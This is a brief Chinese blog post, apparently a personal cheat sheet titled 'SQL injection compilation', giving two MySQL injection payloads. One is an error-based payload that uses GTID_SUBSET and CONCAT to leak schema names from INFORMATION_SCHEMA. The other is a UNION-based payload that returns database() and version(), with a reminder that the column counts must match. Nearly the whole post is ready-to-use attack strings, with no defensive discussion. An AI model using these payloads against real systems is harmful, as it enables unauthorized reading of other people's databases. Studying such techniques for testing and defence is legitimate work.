sql注入整合

Mysql注入

  1. 通过报错 来爆出库信息
    SELECT * FROM test WHERE id = 'dddI /**/' AND GTID_SUBSET ( CONCAT( 0x43646158, ( SELECT MID( IFNULL( CAST( schema_name AS NCHAR ), 0x20 ), 1, 145 ) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6, 1 ), 0x66587655 ), 6420 )
  2. 通过union获取信息 需要注意 列必须对的上
    SELECT id,id,id FROM tp_vote_user WHERE id = 'dddIA6RBJ1E /**/' union select 1,database(),version()
posted @ 2024-09-04 14:54  狂客  阅读(5)  评论(0编辑  收藏  举报